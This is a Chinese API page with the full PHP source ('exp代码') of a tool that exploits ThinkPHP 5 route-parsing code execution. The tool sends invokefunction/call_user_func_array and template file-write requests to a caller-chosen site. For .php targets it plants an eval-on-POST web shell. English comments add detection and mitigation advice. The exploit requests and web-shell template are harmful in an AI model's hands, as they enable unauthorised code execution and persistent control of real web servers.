接口地址:/api.php
返回格式:json
请求方式:get/post
请求示例:/api.php?url=http://www.heibai.org&file=test.php&content=123456
请求参数说明:
返回参数说明:
返回示例:
{
"code": 10001,
"msg": "ok",
"url": "HTTPS://heibai.org.cn/test.php"
}
PHP演示:
<?php
// Client-side template for calling the API described above. The Chinese
// identifiers and strings ("API网址", 'json参数名', '返回信息') are placeholders
// that the reader is expected to replace; nothing here is specific to one endpoint.
header("Content-Type:text/HTML;charset=UTF-8");
date_default_timezone_set("PRC");
$请求参数名 = "内容";
// The request is a plain GET via file_get_contents(); the return value is not
// checked for false before it is decoded.
$result = file_get_contents("API网址".请求参数名);
$arr=json_decode($result,true);
// NOTE(review): the fields below come from a remote service and are echoed
// unescaped into a text/HTML response. Anyone adapting this template should pass
// them through htmlspecialchars() first, otherwise the remote side controls the
// markup of this page.
if ($arr['json参数名']==1) {
echo "返回信息:",$arr['返回信息'];
} else {
echo $arr['返回信息'];
}
?>
exp代码
<?php /* Turns off all PHP error reporting for the rest of the request, so failures in the code below (missing files, undefined indexes, failed requests) produce no visible diagnostics. */ error_reporting(0);?>
<?php
// Call counter for this endpoint. $currency_array is not defined anywhere in the
// visible part of the file; presumably it comes from an include - confirm.
if($currency_array["currency_call_record"]=="1"){
// Read the previous count (intval() of a missing or empty file yields 0).
$counter = intval(file_get_contents("counter.dat"));
// Marks the session under the key '#'. No session_start() is visible here, so
// whether this value persists depends on code outside this listing.
$_SESSION['#'] = true;
$counter++;
// Read-modify-write without any file lock: concurrent requests can lose counts,
// and mode "w" truncates the file before the new value is written.
$fp = fopen("counter.dat","w");
fwrite($fp, $counter);
fclose($fp);
}
else{
// Recording disabled: the counter file is deleted on every request. If it does
// not exist, unlink() fails quietly because error reporting was switched off above.
unlink("counter.dat");
}
?>
<?php
// HTTP entry point of the tool. All three values are taken straight from the
// query string; the only check is the non-empty test below. No authentication,
// scheme/host validation or allow-list is visible in this listing.
//
// Defender's note: a script with this shape on a web server is attack tooling,
// not application code. It turns the host into an unauthenticated relay that
// sends requests to whatever URL the caller supplies, so the outbound traffic is
// attributed to the hosting server. Finding it in a web root is an indicator of
// compromise or abuse and is worth an incident review.
$url=$_GET["url"];
$file=$_GET["file"];
$content=$_GET["content"];
// Loose comparison: a missing parameter (null) also matches "" here.
if ($url=="" or $file=="" or $content==""){
return_json("20011","no","need url or file or content");
}
else{
yjhtp5($url,$file,$content);
// The reply is always "ok" with $url/$file: yjhtp5() returns nothing and the
// remote responses are never inspected, so this code does not confirm that any
// file was actually created on the target.
return_json("10001","ok",$url."/".$file);
}
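/**
 * Prints a three-field JSON status object ("code", "msg", "url") to the response.
 *
 * The values are emitted as given; in this file "url" is built from
 * request parameters, so correct JSON escaping is what keeps a caller-supplied
 * value from altering the structure of the reply.
 *
 * @param mixed $code status code placed under "code"
 * @param mixed $msg  short status text placed under "msg"
 * @param mixed $url  URL or error text placed under "url"
 * @return void
 */
function return_json($code,$msg,$url){
    $result = array(
        'code' => $code,
        'msg'  => $msg,
        'url'  => $url,
    );
    // JSON_UNESCAPED_SLASHES keeps "/" readable in URLs. The previous approach,
    // stripslashes() over the encoded string, also removed the backslashes that
    // escape quotes, backslashes and control characters, which produced invalid
    // JSON and let a supplied value break out of its string.
    echo json_encode($result, JSON_UNESCAPED_UNICODE | JSON_UNESCAPED_SLASHES);
}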
/**
 * Sends each entry of a fixed list of request paths to $url with cURL, after
 * substituting the file-name and content placeholders. The responses are
 * discarded and nothing is returned.
 *
 * Defender's summary: the paths put a class/method reference into the `s` query
 * parameter (`think\app/invokefunction` together with `call_user_func_array` and
 * `file_put_contents`, and `think\template\driver\file/write`). The `think\`
 * namespace points at the ThinkPHP framework and the function name suggests
 * version 5 - presumably the publicly documented route-parsing code-execution
 * flaw; confirm against the framework's own advisory before acting on that.
 *
 * Detection: look in web-server and WAF logs for requests to index.php whose `s`
 * parameter contains a backslash, `invokefunction`, `call_user_func_array` or
 * `template\driver\file`, and for newly created files in the web root, in
 * particular short .php files that pass a POST field to eval().
 *
 * Mitigation: run a framework release in which the controller name taken from
 * the route is validated, reject `s` values containing backslashes at the edge,
 * and make the web root non-writable for the PHP process wherever possible.
 *
 * @param string $url     base URL of the remote site; the caller in this file
 *                        passes it unvalidated from $_GET
 * @param string $file    file name substituted into the request
 * @param string $content substituted as the file content, or, when $file ends in
 *                        ".php", as the POST field name of the generated script
 * @return void
 */
function yjhtp5($url,$file,$content){
// Hard-coded request templates; the first two entries are identical.
// 【文件名】 = file name placeholder, 【内容】 = content placeholder.
$vulnerability_array = array(
"/index.php/?s=index/\think\template\driver\\file/write&cacheFile=【文件名】&content=【内容】",
"/index.php/?s=index/\think\template\driver\\file/write&cacheFile=【文件名】&content=【内容】",
"/index.php/?s=/index/\\think\app/invokefunction&function=call_user_func_array&vars[0]=file_put_contents&vars[1][]=【文件名】&vars[1][]=【内容】");
foreach ($vulnerability_array as $value) {
// strrchr() returns the tail of $file starting at its last dot, so this branch
// is taken only for names ending exactly in ".php" (case-sensitive).
if (strrchr($file,'.')==".php"){
$value=str_replace("【文件名】",$file,$value);
// For .php targets the caller's content is not written as-is: the content
// placeholder is replaced by a one-line eval-on-POST script (a web shell) and
// $content is then inserted at the 【密码】 ("password") placeholder.
$value=str_replace("【内容】","<?php @eval($_POST[【密码】]);?>",$value);
$value=str_replace("【密码】",$content,$value);
}
else{
// Any other extension: $file and $content are substituted verbatim.
$value=str_replace("【文件名】",$file,$value);
$value=str_replace("【内容】",$content,$value);
}
// One GET request per template. No timeout, protocol restriction or URL encoding
// of the substituted values is set here, and $url is used exactly as received.
$c = curl_init();
$url_c = $url.$value;
curl_setopt($c, CURLOPT_URL, $url_c);
curl_setopt($c, CURLOPT_RETURNTRANSFER, 1);
// The response body is captured but never read, so the outcome is unknown.
$data = curl_exec($c);
curl_close($c);
}
}
?>